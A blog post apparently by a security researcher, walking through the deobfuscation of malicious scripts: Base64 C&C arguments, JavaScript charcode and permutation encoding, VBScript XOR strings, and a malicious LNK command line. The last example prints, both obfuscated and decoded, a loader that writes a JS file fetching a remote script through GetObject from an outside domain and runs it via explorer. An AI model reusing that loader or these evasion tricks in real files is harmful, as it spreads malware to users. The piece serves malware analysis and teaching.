Obfuscation is often used by malware samples to hide their SECRETs, but we know how to uncover them. Want to know as well? Check our guide here.

A Bit More On Code Obfuscation

I recently published my analysis of the Netwalker ransomware, which included a deobfuscation step (check it here). I think (de)obfuscation techniques are an interesting subject, so I decided to write a little more about them.

There are basically two types of obfuscation techniques:

  • Binary Level: These are binary transformations that hide instructions and data inside binaries. They are usually implemented by binary packers, which are often used by malware.
  • Source Code Level: These are source code transformations that hide the program's statements. They are often used by malicious scripts.

In this draft, I will consider only the latter case.

The techniques vary, so I will start with the simplest. Some time ago I found the following string in a binary:

GET <domain>/<api>/?DetectPlugin=TuNv&DetectAntiVirus=T0ZG

It is clear that this malware notifies its C&C server about the infected machine's characteristics, but what do the argument values mean? Well, if you are used to malware, you might guess that they are Base64-encoded.

After a base64 -d you get:

DetectPlugin=Não
DetectAntiVirus=OFF

And so you discover that this malware told its C&C server that the infected machine had no security solutions (AV or protection plugins) installed ("Não" is Portuguese for "No"). (OK, this was my sandbox, so it is fine!)
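
The same decoding can be scripted when there are many samples to process. Here is a minimal Python sketch, assuming the values are Latin-1 text (the decoded bytes of TuNv are not valid UTF-8, so this encoding is my assumption, not something stated by the sample):

```python
import base64
from urllib.parse import parse_qsl

# Query string copied from the request found in the binary.
query = "DetectPlugin=TuNv&DetectAntiVirus=T0ZG"

# Decode every argument value; Latin-1 is an assumed text encoding.
decoded = {
    name: base64.b64decode(value).decode("latin-1")
    for name, value in parse_qsl(query)
}

for name, value in decoded.items():
    print(f"{name}={value}")
```

This prints the same two lines that base64 -d produced above.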

OK, that one was easy: only a standard tool was required. Let's now move to a custom solution. Take a look at this JavaScript excerpt:

var f = String.fromCharCode(731 - 699, 817 - 699, 796 - 699, 813 - 699, 731 - 699, 820 - 699,
eval(f);

This code builds a string from characters computed at runtime through simple arithmetic, as follows:

var f = String.fromCharCode(32, 118, 97, 114, 32, 121, ...
eval(f);

This is a very simple string manipulation technique, yet it is effective at bypassing many verification routines. The computation leads to the following result:

var y ...

The variable declaration was hidden in this string. Although not very resilient, this approach scales well: notice that 699 is a constant, so an attacker can easily produce a new encoding by switching to a different constant.
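
Since every term carries its own constant, a decoder does not need to know 699 in advance. The following Python sketch evaluates the subtractions and rebuilds the string; the function name decode_charcode_args is mine, and only the six terms visible in the excerpt are used because the rest of the call is elided:

```python
import re

def decode_charcode_args(args):
    """Evaluate each 'a - b' term and map the result to a character."""
    chars = []
    for minuend, subtrahend in re.findall(r"(\d+)\s*-\s*(\d+)", args):
        chars.append(chr(int(minuend) - int(subtrahend)))
    return "".join(chars)

# The six terms visible in the excerpt (the remaining ones are elided).
visible = "731 - 699, 817 - 699, 796 - 699, 813 - 699, 731 - 699, 820 - 699"
print(repr(decode_charcode_args(visible)))  # ' var y'
```

Because the constant is read from each term, the same sketch keeps working if the attacker switches to another constant.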

Attackers might also employ slightly more complex techniques. Look at this VBScript (VBS) excerpt:

set objShell = CreateObject(CryptXor("c0+\4","N0X") & ".Application")

The object is instantiated from an encoded string and a key. Luckily for us, scripts must embed their own decryption routines to be functional. Therefore, we can read the routine and decrypt the string. Although we could use the script itself, I opted to implement my own decrypter in Python:

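import sys

def CryptXor(StringUse, Password):
    # XOR each character with the repeating key (1-based key index)
    retstr = ""
    for i in range(1, len(StringUse) + 1):
        c_use = StringUse[i - 1]
        c_pwd = Password[i % len(Password)]
        retstr = retstr + chr(ord(c_use) ^ ord(c_pwd))
    return retstr

# Print the inputs and the decoded string.
print((sys.argv[1], sys.argv[2], CryptXor(sys.argv[1], sys.argv[2])))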

Thus, if we decrypt it:

python CryptXor.py "c0+\4" "N0X"
  ('c0+\\4', 'N0X', 'Shell')

We find that the encoded string hides the Shell keyword, so the object being instantiated is Shell.Application.
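
XOR with a repeating key is its own inverse, so the same routine both encodes and decodes. The sketch below is a compact Python 3 variant of the decrypter above (the name crypt_xor is mine); it keeps the key index starting at 1 to mirror the original loop and shows the round trip:

```python
def crypt_xor(data, key):
    """Repeating-key XOR; the key index starts at 1, as in the decrypter above."""
    return "".join(
        chr(ord(c) ^ ord(key[(i + 1) % len(key)]))
        for i, c in enumerate(data)
    )

encoded = "c0+\\4"
decoded = crypt_xor(encoded, "N0X")
print(decoded)                                # Shell
print(crypt_xor(decoded, "N0X") == encoded)   # True
```

This also means an analyst can re-encode known keywords with a recovered key and search for them in other samples.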

This type of technique is not limited to a specific language such as VBS. Here is a JavaScript example:

var Owj = krs('vonyjtznkfuxwmseruhibrlcartdcqtcgpoos').substr(0, Uhk);

We follow the same procedure and write a decoder based on the script's own source code:

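import sys

def dec(z):
    # z is a list of characters, permuted in place by a series of swaps
    u = 269863
    for q in range(0, len(z)):
        i = u * (q + 118) + (u % 39272)
        f = u * (q + 177) + (u % 44074)
        r = i % len(z)
        j = f % len(z)
        # swap the characters at positions r and j
        y = z[r]
        z[r] = z[j]
        z[j] = y
        u = (i + f) % 4206333
    return z

# Keep the first 11 characters of the result.
print(''.join(dec(list(sys.argv[1]))[:11]))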

When we run it:

python decode.py vonyjtznkfuxwmseruhibrlcartdcqtcgpoos
constructor

We discover that the string holds a constructor keyword for the malicious class.

Finally, a slightly more complex example. Some time ago I received a malicious LNK file (ya, Windows shortcuts!). If we parse it using an LNK parsing tool (check here), we get the following target command:

commandLineArguments: /c "sET WKD=%wDRFDWINDRFDWdIDRFDWr%\DRFDWExDRFDWpLDRFDWoRDRFDWEr DRFDW/cDRFDW,&&sET CAG=GeIKMLPWtOIKMLPWbjeIKMLPWct(IKMLPW'scIKMLPWriIKMLPWpt:IKMLPWhTtIKMLPWPSIKMLPW:&&sET Fbi8kEi=1FOAS1FOASe647on3aeqh.30e29124934178cf14e.ga1FOAS?011FOAS')&&sET/^p xmfq9Lx="%CAG:IKMLPW=%%Fbi8kEi:1FOAS=/%"<NUL > C:\Users\Public\Pictures\njuarb4.js|md ^\ ^||CAll %WKD:DRFDW=% C:\Users\Public\Pictures\njuarb4.js|exit"

It is an obfuscated CMD/bat script. Let's consider the individual statements for better readability:

set wkd=%wdrfdwindrfdwdidrfdwr%\drfdwexdrfdwpldrfdwordrfdwer drfdw/cdrfdw,
set cag=geikmlpwtoikmlpwbjeikmlpwct(ikmlpw'scikmlpwriikmlpwpt:ikmlpwhttikmlpwpsikmlpw:
set fbi8kei=1foas1foase647on3aeqh.30e29124934178cf14e.ga1foas?011foas')
set/^p xmfq9lx=%cag:ikmlpw=%%fbi8kei:1foas=/%<nul > c:\users\public\pictures\njuarb4.js|md ^\ ^

We see that the obfuscation technique is basically substring manipulation. Each string is assigned to a variable and later referenced as part of the next statement.

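One trick employed is to split the string into tokens with a junk marker. Notice in the following statement that the 1foas marker appears twice at the beginning, once before ?01, and once at the end of the string. Each occurrence is replaced by / when the variable is referenced as %fbi8kei:1foas=/%, whereas the ikmlpw and drfdw markers in the other variables are simply removed.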

set fbi8kei=1foas1foase647on3aeqh.30e29124934178cf14e.ga1foas?011foas')

If we perform this variable replacement procedure, we get:

getobject('script:https://e647on3aeqh.30e29124934178cf14e.ga/?01/')<nul > c:\users\public\pictures\njuarb4.js|md ^\ ^|| call %windir%\explorer /c, c:\users\public\pictures\njuarb4.js|exit

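This is the actual malicious action: a one-line JavaScript file that loads a remote script through GetObject is written to disk and then launched via explorer.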
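
The replacement step can be reproduced offline with a short Python sketch. It emulates only the %name:old=new% syntax of cmd.exe, which is a simplification; the helper name expand and the regular expression are mine, and the variable values are copied from the lowercased statements above:

```python
import re

# Variable values copied from the lowercased statements.
variables = {
    "wkd": "%wdrfdwindrfdwdidrfdwr%\\drfdwexdrfdwpldrfdwordrfdwer drfdw/cdrfdw,",
    "cag": "geikmlpwtoikmlpwbjeikmlpwct(ikmlpw'scikmlpwriikmlpwpt:ikmlpwhttikmlpwpsikmlpw:",
    "fbi8kei": "1foas1foase647on3aeqh.30e29124934178cf14e.ga1foas?011foas')",
}

# Matches %name:old=new% references (new may be empty).
SUBST = re.compile(r"%([^%:=]+):([^%=]+)=([^%]*)%")

def expand(text, env):
    """Expand %name:old=new% references (simplified cmd.exe emulation)."""
    def repl(match):
        name, old, new = match.group(1).lower(), match.group(2), match.group(3)
        if name not in env:
            return match.group(0)  # leave unknown variables untouched
        # cmd.exe matches the search string case-insensitively.
        return re.sub(re.escape(old), lambda _: new, env[name], flags=re.IGNORECASE)
    return SUBST.sub(repl, text)

payload = expand("%cag:ikmlpw=%%fbi8kei:1foas=/%", variables)
launcher = expand("%wkd:drfdw=%", variables)
print(payload)
print(launcher)
```

Replacing 1foas with / yields a URL that ends in /?01/, and stripping drfdw from wkd yields %windir%\explorer /c, which is what the final CALL executes.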

In the end, code obfuscation is just a way to confuse analysts and to consume the processing time of both analysts and security solutions. Join me in researching automatic deobfuscation techniques.


About the Authors

Marcus Botacin
PhD Student at Federal University of Paraná

Computer Eng. @UNICAMP, 2015
MSc, CS @UNICAMP, 2017